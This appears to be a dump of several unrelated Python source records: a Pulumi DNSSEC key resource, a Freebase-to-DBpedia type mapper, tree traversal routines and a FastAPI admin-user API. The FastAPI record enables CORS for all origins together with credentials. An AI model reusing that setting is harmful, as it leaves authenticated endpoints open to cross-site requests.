domain: Optional[pulumi.Input[str]] = None,
ds: Optional[pulumi.Input[str]] = None,
flags: Optional[pulumi.Input[int]] = None,
public_key: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tag: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering Key resources.
:param pulumi.Input[int] algorithm: DNSSEC algorithm type
:param pulumi.Input[str] algorithm_name: DNSSEC algorithm name
:param pulumi.Input[bool] deleted: Is the key deleted?
:param pulumi.Input[str] domain: Domain name
:param pulumi.Input[str] ds: DS record as RFC1035 line
:param pulumi.Input[int] flags: DNSSEC key flags
:param pulumi.Input[str] public_key: Public key
:param pulumi.Input[str] status: Current status of the key
:param pulumi.Input[int] tag: Tag
"""
if algorithm is not None:
pulumi.set(__self__, "algorithm", algorithm)
if algorithm_name is not None:
pulumi.set(__self__, "algorithm_name", algorithm_name)
if deleted is not None:
pulumi.set(__self__, "deleted", deleted)
if domain is not None:
pulumi.set(__self__, "domain", domain)
if ds is not None:
pulumi.set(__self__, "ds", ds)
if flags is not None:
pulumi.set(__self__, "flags", flags)
if public_key is not None:
pulumi.set(__self__, "public_key", public_key)
if status is not None:
pulumi.set(__self__, "status", status)
if tag is not None:
pulumi.set(__self__, "tag", tag)
@property
@pulumi.getter
def algorithm(self) -> Optional[pulumi.Input[int]]:
"""
DNSSEC algorithm type
"""
return pulumi.get(self, "algorithm")
@algorithm.setter
def algorithm(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "algorithm", value)
@property
@pulumi.getter(name="algorithmName")
def algorithm_name(self) -> Optional[pulumi.Input[str]]:
"""
DNSSEC algorithm name
"""
return pulumi.get(self, "algorithm_name")
@algorithm_name.setter
def algorithm_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "algorithm_name", value)
@property
@pulumi.getter
def deleted(self) -> Optional[pulumi.Input[bool]]:
"""
Is the key deleted?
"""
return pulumi.get(self, "deleted")
@deleted.setter
def deleted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "deleted", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
"""
Domain name
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter
def ds(self) -> Optional[pulumi.Input[str]]:
"""
DS record as RFC1035 line
"""
return pulumi.get(self, "ds")
@ds.setter
def ds(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ds", value)
@property
@pulumi.getter
def flags(self) -> Optional[pulumi.Input[int]]:
"""
DNSSEC key flags
"""
return pulumi.get(self, "flags")
@flags.setter
def flags(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "flags", value)
@property
@pulumi.getter(name="publicKey")
def public_key(self) -> Optional[pulumi.Input[str]]:
"""
Public key
"""
return pulumi.get(self, "public_key")
@public_key.setter
def public_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "public_key", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Current status of the key
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tag(self) -> Optional[pulumi.Input[int]]:
"""
Tag
"""
return pulumi.get(self, "tag")
@tag.setter
def tag(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "tag", value)
class Key(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
domain: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Create a Key resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] domain: Domain name
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: KeyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a Key resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param KeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(KeyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
domain: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = KeyArgs.__new__(KeyArgs)
if domain is None and not opts.urn:
raise TypeError("Missing required property 'domain'")
__props__.__dict__["domain"] = domain
__props__.__dict__["algorithm"] = None
__props__.__dict__["algorithm_name"] = None
__props__.__dict__["deleted"] = None
__props__.__dict__["ds"] = None
__props__.__dict__["flags"] = None
__props__.__dict__["public_key"] = None
__props__.__dict__["status"] = None
__props__.__dict__["tag"] = None
super(Key, __self__).__init__(
'gandi:livedns/key:Key',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
algorithm: Optional[pulumi.Input[int]] = None,
algorithm_name: Optional[pulumi.Input[str]] = None,
deleted: Optional[pulumi.Input[bool]] = None,
domain: Optional[pulumi.Input[str]] = None,
ds: Optional[pulumi.Input[str]] = None,
flags: Optional[pulumi.Input[int]] = None,
public_key: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tag: Optional[pulumi.Input[int]] = None) -> 'Key':
"""
Get an existing Key resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] algorithm: DNSSEC algorithm type
:param pulumi.Input[str] algorithm_name: DNSSEC algorithm name
:param pulumi.Input[bool] deleted: Is the key deleted?
:param pulumi.Input[str] domain: Domain name
:param pulumi.Input[str] ds: DS record as RFC1035 line
:param pulumi.Input[int] flags: DNSSEC key flags
:param pulumi.Input[str] public_key: Public key
:param pulumi.Input[str] status: Current status of the key
:param pulumi.Input[int] tag: Tag
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _KeyState.__new__(_KeyState)
__props__.__dict__["algorithm"] = algorithm
__props__.__dict__["algorithm_name"] = algorithm_name
__props__.__dict__["deleted"] = deleted
__props__.__dict__["domain"] = domain
__props__.__dict__["ds"] = ds
__props__.__dict__["flags"] = flags
__props__.__dict__["public_key"] = public_key
__props__.__dict__["status"] = status
__props__.__dict__["tag"] = tag
return Key(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def algorithm(self) -> pulumi.Output[int]:
"""
DNSSEC algorithm type
"""
return pulumi.get(self, "algorithm")
@property
@pulumi.getter(name="algorithmName")
def algorithm_name(self) -> pulumi.Output[str]:
"""
DNSSEC algorithm name
"""
return pulumi.get(self, "algorithm_name")
@property
@pulumi.getter
def deleted(self) -> pulumi.Output[bool]:
"""
Is the key deleted?
"""
return pulumi.get(self, "deleted")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[str]:
"""
Domain name
"""
return pulumi.get(self, "domain")
@property
@pulumi.getter
def ds(self) -> pulumi.Output[str]:
"""
DS record as RFC1035 line
"""
return pulumi.get(self, "ds")
@property
@pulumi.getter
def flags(self) -> pulumi.Output[int]:
"""
DNSSEC key flags
"""
return pulumi.get(self, "flags")
@property
@pulumi.getter(name="publicKey")
def public_key(self) -> pulumi.Output[str]:
"""
Public key
"""
return pulumi.get(self, "public_key")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
Current status of the key
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def tag(self) -> pulumi.Output[int]:
"""
Tag
"""
return pulumi.get(self, "tag") | sdk/python/pulumi_gandi/livedns/key.py |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['KeyArgs', 'Key']
@pulumi.input_type
class KeyArgs:
def __init__(__self__, *,
domain: pulumi.Input[str]):
"""
The set of arguments for constructing a Key resource.
:param pulumi.Input[str] domain: Domain name
"""
pulumi.set(__self__, "domain", domain)
@property
@pulumi.getter
def domain(self) -> pulumi.Input[str]:
"""
Domain name
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: pulumi.Input[str]):
pulumi.set(self, "domain", value)
@pulumi.input_type
class _KeyState:
def __init__(__self__, *,
algorithm: Optional[pulumi.Input[int]] = None,
algorithm_name: Optional[pulumi.Input[str]] = None,
deleted: Optional[pulumi.Input[bool]] = None,
domain: Optional[pulumi.Input[str]] = None,
ds: Optional[pulumi.Input[str]] = None,
flags: Optional[pulumi.Input[int]] = None,
public_key: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tag: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering Key resources.
:param pulumi.Input[int] algorithm: DNSSEC algorithm type
:param pulumi.Input[str] algorithm_name: DNSSEC algorithm name
:param pulumi.Input[bool] deleted: Is the key deleted?
:param pulumi.Input[str] domain: Domain name
:param pulumi.Input[str] ds: DS record as RFC1035 line
:param pulumi.Input[int] flags: DNSSEC key flags
:param pulumi.Input[str] public_key: Public key
:param pulumi.Input[str] status: Current status of the key
:param pulumi.Input[int] tag: Tag
"""
if algorithm is not None:
pulumi.set(__self__, "algorithm", algorithm)
if algorithm_name is not None:
pulumi.set(__self__, "algorithm_name", algorithm_name)
if deleted is not None:
pulumi.set(__self__, "deleted", deleted)
if domain is not None:
pulumi.set(__self__, "domain", domain)
if ds is not None:
pulumi.set(__self__, "ds", ds)
if flags is not None:
pulumi.set(__self__, "flags", flags)
if public_key is not None:
pulumi.set(__self__, "public_key", public_key)
if status is not None:
pulumi.set(__self__, "status", status)
if tag is not None:
pulumi.set(__self__, "tag", tag)
@property
@pulumi.getter
def algorithm(self) -> Optional[pulumi.Input[int]]:
"""
DNSSEC algorithm type
"""
return pulumi.get(self, "algorithm")
@algorithm.setter
def algorithm(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "algorithm", value)
@property
@pulumi.getter(name="algorithmName")
def algorithm_name(self) -> Optional[pulumi.Input[str]]:
"""
DNSSEC algorithm name
"""
return pulumi.get(self, "algorithm_name")
@algorithm_name.setter
def algorithm_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "algorithm_name", value)
@property
@pulumi.getter
def deleted(self) -> Optional[pulumi.Input[bool]]:
"""
Is the key deleted?
"""
return pulumi.get(self, "deleted")
@deleted.setter
def deleted(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "deleted", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
"""
Domain name
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter
def ds(self) -> Optional[pulumi.Input[str]]:
"""
DS record as RFC1035 line
"""
return pulumi.get(self, "ds")
@ds.setter
def ds(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ds", value)
@property
@pulumi.getter
def flags(self) -> Optional[pulumi.Input[int]]:
"""
DNSSEC key flags
"""
return pulumi.get(self, "flags")
@flags.setter
def flags(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "flags", value)
@property
@pulumi.getter(name="publicKey")
def public_key(self) -> Optional[pulumi.Input[str]]:
"""
Public key
"""
return pulumi.get(self, "public_key")
@public_key.setter
def public_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "public_key", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Current status of the key
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tag(self) -> Optional[pulumi.Input[int]]:
"""
Tag
"""
return pulumi.get(self, "tag")
@tag.setter
def tag(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "tag", value)
class Key(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
domain: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Create a Key resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] domain: Domain name
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: KeyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a Key resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param KeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(KeyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
domain: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = KeyArgs.__new__(KeyArgs)
if domain is None and not opts.urn:
raise TypeError("Missing required property 'domain'")
__props__.__dict__["domain"] = domain
__props__.__dict__["algorithm"] = None
__props__.__dict__["algorithm_name"] = None
__props__.__dict__["deleted"] = None
__props__.__dict__["ds"] = None
__props__.__dict__["flags"] = None
__props__.__dict__["public_key"] = None
__props__.__dict__["status"] = None
__props__.__dict__["tag"] = None
super(Key, __self__).__init__(
'gandi:livedns/key:Key',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
algorithm: Optional[pulumi.Input[int]] = None,
algorithm_name: Optional[pulumi.Input[str]] = None,
deleted: Optional[pulumi.Input[bool]] = None,
domain: Optional[pulumi.Input[str]] = None,
ds: Optional[pulumi.Input[str]] = None,
flags: Optional[pulumi.Input[int]] = None,
public_key: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tag: Optional[pulumi.Input[int]] = None) -> 'Key':
"""
Get an existing Key resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] algorithm: DNSSEC algorithm type
:param pulumi.Input[str] algorithm_name: DNSSEC algorithm name
:param pulumi.Input[bool] deleted: Is the key deleted?
:param pulumi.Input[str] domain: Domain name
:param pulumi.Input[str] ds: DS record as RFC1035 line
:param pulumi.Input[int] flags: DNSSEC key flags
:param pulumi.Input[str] public_key: Public key
:param pulumi.Input[str] status: Current status of the key
:param pulumi.Input[int] tag: Tag
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _KeyState.__new__(_KeyState)
__props__.__dict__["algorithm"] = algorithm
__props__.__dict__["algorithm_name"] = algorithm_name
__props__.__dict__["deleted"] = deleted
__props__.__dict__["domain"] = domain
__props__.__dict__["ds"] = ds
__props__.__dict__["flags"] = flags
__props__.__dict__["public_key"] = public_key
__props__.__dict__["status"] = status
__props__.__dict__["tag"] = tag
return Key(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def algorithm(self) -> pulumi.Output[int]:
"""
DNSSEC algorithm type
"""
return pulumi.get(self, "algorithm")
@property
@pulumi.getter(name="algorithmName")
def algorithm_name(self) -> pulumi.Output[str]:
"""
DNSSEC algorithm name
"""
return pulumi.get(self, "algorithm_name")
@property
@pulumi.getter
def deleted(self) -> pulumi.Output[bool]:
"""
Is the key deleted?
"""
return pulumi.get(self, "deleted")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[str]:
"""
Domain name
"""
return pulumi.get(self, "domain")
@property
@pulumi.getter
def ds(self) -> pulumi.Output[str]:
"""
DS record as RFC1035 line
"""
return pulumi.get(self, "ds")
@property
@pulumi.getter
def flags(self) -> pulumi.Output[int]:
"""
DNSSEC key flags
"""
return pulumi.get(self, "flags")
@property
@pulumi.getter(name="publicKey")
def public_key(self) -> pulumi.Output[str]:
"""
Public key
"""
return pulumi.get(self, "public_key")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
Current status of the key
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def tag(self) -> pulumi.Output[int]:
"""
Tag
"""
return pulumi.get(self, "tag") | 0.855066 | 0.077169 |
from collections import defaultdict
import sys, csv, bz2, re
import rdflib
import getopt
#Read command line options
options, operands = getopt.getopt(sys.argv[4:], "", ["one_type_per_line"])
#getopt yields ("--one_type_per_line", "") for a bare flag; record its presence
#as a boolean so later truthiness checks on config work as intended
config = {"one_type_per_line": any(name == "--one_type_per_line" for name, _ in options)}
csv.field_size_limit(1000000000)
IGNORED_PREFIXES = ["/base/", "/user/", "/m/", "/common/topic", "/freebase",
"/influence", "/dataworld", "/common", "/type", "/atom"]
FREEBASE_RDF_PREFIX = "http://rdf.freebase.com/ns"
def filterTypes(freebase_type):
#Ignore domains, since domain equality for Freebase is defined within DBpedia Spotlight (FreebaseType.equals(...))
if freebase_type.count("/") < 2:
return False
#Ignore all of these prefixes:
for prefix in IGNORED_PREFIXES:
if freebase_type.startswith(prefix):
return False
return True
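#Example (added): a bare domain such as "/music" has fewer than two slashes and
#is rejected, "/m/0abc" matches an ignored prefix and is rejected, while a full
#type such as "/music/artist" passes the filter.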
def getSubjectAndObject(line, predicate, safe=True):
if safe:
g = rdflib.Graph()
g.parse(data=line, format="nt")
subject = g.subjects().next()
object = g.objects().next()
return subject, object
else:
r = re.search("<(.*)> <" + predicate + "> <(.*)>.*", line)
if r is not None :
subject = r.group(1)
object = r.group(2)
return subject, object
else:
#E.g.:<http://en.wikipedia.org/wiki/AfroAsiaticLanguages> <http://dbpedia.org/ontology/wikiPageID> "40"^^<http://www.w3.org/2001/XMLSchema#integer> .
r = re.search("<(.*)> <" + predicate + "> \"(.*)\".*", line)
if r is not None :
subject = r.group(1)
object = r.group(2)
return subject, object
def addToDictionary(ntfile, dictionary, predicate, label=None, safe=True, objects_as_list=False, reverse=False, sfunc=str, ofunc=str):
if ntfile.endswith(".bz2"):
f = bz2.BZ2File(ntfile)
else:
f = open(ntfile)
i = 0
for next in f:
i += 1
if next is None or next == "":
break
try:
if reverse:
object, subject = getSubjectAndObject(next, predicate, safe=safe)
else:
subject, object = getSubjectAndObject(next, predicate, safe=safe)
except TypeError:
continue
subject = sfunc(subject)
if subject not in dictionary:
dictionary[subject] = {}
if objects_as_list:
if label not in dictionary[subject]:
dictionary[subject][label] = [object]
elif object not in dictionary[subject][label]:
dictionary[subject][label].append(object)
elif label is None:
dictionary[subject] = ofunc(object)
else:
dictionary[subject][label] = ofunc(object)
return dictionary
freebaseTypeDict = defaultdict(int)
def countFreebaseTypes(freebaseTypes):
#Extend the list of types with the base types but only count them once (list -> set)
freebaseTypesToCount = freebaseTypes[:]
freebaseTypesToCount.extend(set(map(lambda x: "/" + x.split("/")[1], freebaseTypes)))
for freebaseType in freebaseTypesToCount:
freebaseTypeDict[freebaseType] += 1
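#Example (added): counting ["/music/artist", "/music/group_member"] increments
#each full type once and the shared base domain "/music" only once, since the
#derived base types are deduplicated through set() before counting.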
def main():
page_ids = sys.argv[1]
wiki_links = sys.argv[2]
freebase_dump = sys.argv[3]
outfile_types = "types.freebase.tsv"
outfile_freebase_identifier = "typestats.freebase.tsv"
print >>sys.stderr, "Reading Wikipedia id to Wikipedia page mapping..."
idToPage = addToDictionary(page_ids, {}, "http://dbpedia.org/ontology/wikiPageID", reverse=True, safe=False,
ofunc=lambda x: str(x).replace("http://en.wikipedia.org/wiki/", ""))
print >>sys.stderr, "Reading Wikipedia page to DBpedia mapping..."
pageToDBpedia = addToDictionary(wiki_links, {}, "http://xmlns.com/foaf/0.1/primaryTopic", safe=False,
sfunc=lambda x: str(x).replace("http://en.wikipedia.org/wiki/", ""),
ofunc=lambda x: str(x).replace("http://dbpedia.org/resource/", ""))
freebaseReader = csv.reader(bz2.BZ2File(freebase_dump), delimiter='\t')
#freebaseTypes = {}
print >>sys.stderr, "Processing Freebase dump..."
typeWriter = csv.writer(open(outfile_types, "w"), delimiter='\t')
for row in freebaseReader:
if row[3].startswith("/wikipedia/en_"):
#There is a match with Wikipedia:
wikiID = row[3].replace("/wikipedia/en_id/", "")
try:
wikiPage = idToPage[wikiID]
dbpediaID = pageToDBpedia[wikiPage]
types = filter(filterTypes, row[4].split(","))
types.extend(set(map(lambda x: x[:x.rfind("/")], types)))
if len(types) > 0:
countFreebaseTypes(types)
#freebaseTypes[dbpediaID] = types
if config.get("one_type_per_line"):
for fbType in types:
typeWriter.writerow([dbpediaID, FREEBASE_RDF_PREFIX + fbType])
else:
typeWriter.writerow([dbpediaID, ",".join(types)])
except KeyError:
print row[0]
typeIdentifierWriter = csv.writer(open(outfile_freebase_identifier, "w"), delimiter='\t')
typeIdentifierWriter.writerows([[k, v] for (k, v) in freebaseTypeDict.items()])
if __name__ == "__main__":
if len(sys.argv) != 4:
print __doc__
else:
main() | index/src/main/scripts/DBpediaResource/types_freebase.py | 0.319121 | 0.145085
from __future__ import annotations
from typing import Optional
class TreeNode:
def __init__(self, val: int, left: Optional[TreeNode] = None, right: Optional[TreeNode] = None) -> None:
self.val = val
self.left = left
self.right = right
def preorder(root: TreeNode) -> list[int]:
stack: list[TreeNode] = []
result: list[int] = []
cur: Optional[TreeNode] = root
while cur or stack:
if cur:
result.append(cur.val)
if cur.right:
stack.append(cur.right)
cur = cur.left
else:
cur = stack.pop()
return result
def preorder2(root: TreeNode) -> list[int]:
stack: list[TreeNode] = [root]
result: list[int] = []
while stack:
cur = stack.pop()
result.append(cur.val)
if cur.right: stack.append(cur.right)
if cur.left: stack.append(cur.left)
return result
def inorder(root: TreeNode) -> list[int]:
stack: list[TreeNode] = []
result: list[int] = []
cur: Optional[TreeNode] = root
while cur or stack:
if cur:
stack.append(cur)
cur = cur.left
else:
cur = stack.pop()
result.append(cur.val)
cur = cur.right
return result
def inorder2(root: TreeNode) -> list[int]:
stack: list[tuple[TreeNode, bool]] = [(root, False)]
result: list[int] = []
while stack:
cur, visited = stack.pop()
if not visited:
stack.append((cur, True))
if cur.left: stack.append((cur.left, False))
else:
result.append(cur.val)
if cur.right: stack.append((cur.right, False))
return result
# Morris Traversal
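# (added note: the trick is to thread each left subtree's rightmost node back
# to the current node, so the walk can return without a stack in O(1) extra
# space; each thread is removed once it has been followed)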
def inorder3(root: TreeNode) -> list[int]:
result: list[int] = []
cur: Optional[TreeNode] = root
while cur:
if not cur.left:
result.append(cur.val)
cur = cur.right
else:
linker: TreeNode = cur.left
while linker.right != cur and linker.right is not None:
linker = linker.right
if linker.right == cur:
result.append(cur.val)
cur = cur.right
linker.right = None
else:
linker.right = cur
cur = cur.left
return result
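# A recursive reference implementation (added for cross-checking the iterative
# and Morris versions above, e.g. inorder3(root) == _inorder_recursive(root)):
def _inorder_recursive(root: Optional[TreeNode]) -> list[int]:
    if root is None:
        return []
    return _inorder_recursive(root.left) + [root.val] + _inorder_recursive(root.right)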
def postorder(root: TreeNode) -> list[int]:
stack: list[tuple[TreeNode, bool]] = []
result: list[int] = []
cur: Optional[TreeNode] = root
while cur or stack:
if cur:
stack.append((cur, False))
cur = cur.left
else:
cur, visited = stack.pop()
if visited:
result.append(cur.val)
cur = None
else:
stack.append((cur, True))
cur = cur.right
return result
def postorder2(root: TreeNode) -> list[int]:
stack: list[tuple[TreeNode, int]] = [(root, 0)]
result: list[int] = []
while stack:
cur, state = stack.pop()
if state == 0:
stack.append((cur, 1))
if cur.left: stack.append((cur.left, 0))
if state == 1:
stack.append((cur, 2))
if cur.right: stack.append((cur.right, 0))
if state == 2:
result.append(cur.val)
return result
def _gen_tree() -> TreeNode:
nodes: list[TreeNode] = []
for i in range(6):
nodes.append(TreeNode(i))
nodes[0].left = nodes[1]
nodes[1].right = nodes[2]
nodes[2].left = nodes[3]
nodes[0].right = nodes[4]
nodes[4].right = nodes[5]
return nodes[0]
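# For the tree built above (0 -> left 1, right 4; 1 -> right 2; 2 -> left 3;
# 4 -> right 5), the hand-computed expected orders are:
#   preorder  [0, 1, 2, 3, 4, 5]
#   inorder   [1, 3, 2, 0, 4, 5]
#   postorder [3, 2, 1, 5, 4, 0]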
if __name__ == '__main__':
root = _gen_tree()
# print(preorder2(root))
# print(inorder3(root))
    # print(postorder2(root)) | .archived/snakecode/other/btree_traversal.py | 0.764012 | 0.426859 |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, Optional
from uuid import UUID
from dotenv import load_dotenv
import os
from datetime import timedelta
from fastapi import Depends, FastAPI, HTTPException, status
from fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm
from jose import JWTError, jwt
from passlib.context import CryptContext
from starlette.middleware.cors import CORSMiddleware
import uvicorn
from sqlalchemy.orm import Session
from app.utils import crud, models, schemas
from app.utils import processing
from app.utils.schemas import AdminUser, TokenData
from app.utils.processing import get_users, get_user, \
get_password_hash, authenticate_user, create_access_token
from app.utils.database import SessionLocal, engine
models.Base.metadata.create_all(bind=engine)
load_dotenv()
SECRET_KEY = str(os.getenv("SECRET_KEY"))
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 30
app = FastAPI()
app.add_middleware(
CORSMiddleware,
allow_origins=["*"], # Allows all origins
allow_credentials=True,
allow_methods=["*"], # Allows all methods
allow_headers=["*"], # Allows all headers
)
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="access_token")
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
# Dependency
def get_db():
db = SessionLocal()
try:
yield db
finally:
db.close()
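# Decode the bearer token, look up the user named in its "sub" claim, and fail
# with 401 on any problem (bad signature, missing claim, or unknown user).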
async def get_current_user(access_token: str = Depends(oauth2_scheme),
db: Session = Depends(get_db)):
credentials_exception = HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Could not validate credentials",
headers={"WWW-Authenticate": "Bearer"},
)
try:
payload = jwt.decode(access_token, SECRET_KEY, algorithms=[ALGORITHM])
        username = payload.get("sub")  # may be None if the "sub" claim is absent
if username is None:
raise credentials_exception
token_data = TokenData(username=username)
except JWTError:
raise credentials_exception
user_obj = await crud.get_users(db)
user_dict = get_users(user_obj)
user = get_user(user_dict, username=token_data.username)
if user is None:
raise credentials_exception
return user
async def get_current_active_user(current_user: AdminUser = Depends(get_current_user)):
if current_user.disabled:
raise HTTPException(status_code=400, detail="Inactive user")
return current_user
@app.post("/access_token", response_model=schemas.Token)
async def login_for_access_token(form_data: OAuth2PasswordRequestForm = Depends(),
db: Session = Depends(get_db)):
user_obj = await crud.get_users(db)
user_dict = get_users(user_obj)
user = authenticate_user(
user_dict, form_data.username, form_data.password)
if not user:
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Incorrect username or password",
headers={"WWW-Authenticate": "Bearer"},
)
access_token_expires = timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)
access_token = create_access_token(
data={"sub": user.username}, expires_delta=access_token_expires
)
return {"access_token": access_token, "token_type": "bearer"}
@app.get("/users/me")
async def read_users_me(current_user: AdminUser = Depends(get_current_active_user)):
return current_user
@app.post("/user/create/")
async def create_user(
user: schemas.AdminUserCreate,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(get_current_active_user)):
if not current_user:
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Invalid authentication credentials",
headers={"WWW-Authenticate": "Bearer"},
)
db_user = await crud.get_user_by_username(db, username=user.username)
if db_user:
raise HTTPException(status_code=400, detail="User already registered")
    password_hashed = get_password_hash(user.password)
return await crud.create_admin_user(db=db, user=user, password=password_hashed)
@app.post("/user/update/")
async def update_user(
user: schemas.AdminUserCreate,
db: Session = Depends(get_db),
current_user: AdminUser = Depends(get_current_active_user)):
if not current_user:
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Invalid authentication credentials",
headers={"WWW-Authenticate": "Bearer"},
)
db_user = await crud.get_user_by_username(db, username=user.username)
if not db_user:
raise HTTPException(status_code=400, detail="User is not registered")
password_hashed = get_password_hash(user.password)
return await crud.update_admin_user(db=db, user=user, password=password_hashed)
@app.post("/user/delete/")
async def delete_user(
user: schemas.AdminUserDelete, db: Session = Depends(get_db),
current_user: AdminUser = Depends(get_current_active_user)):
db_user = await crud.get_user_by_username(db, username=user.username)
if not db_user:
raise HTTPException(status_code=400, detail="User not registered")
else:
return await crud.delete_admin_user(db=db, user=user)
@app.get("/users/", response_model=List[schemas.AdminUser])
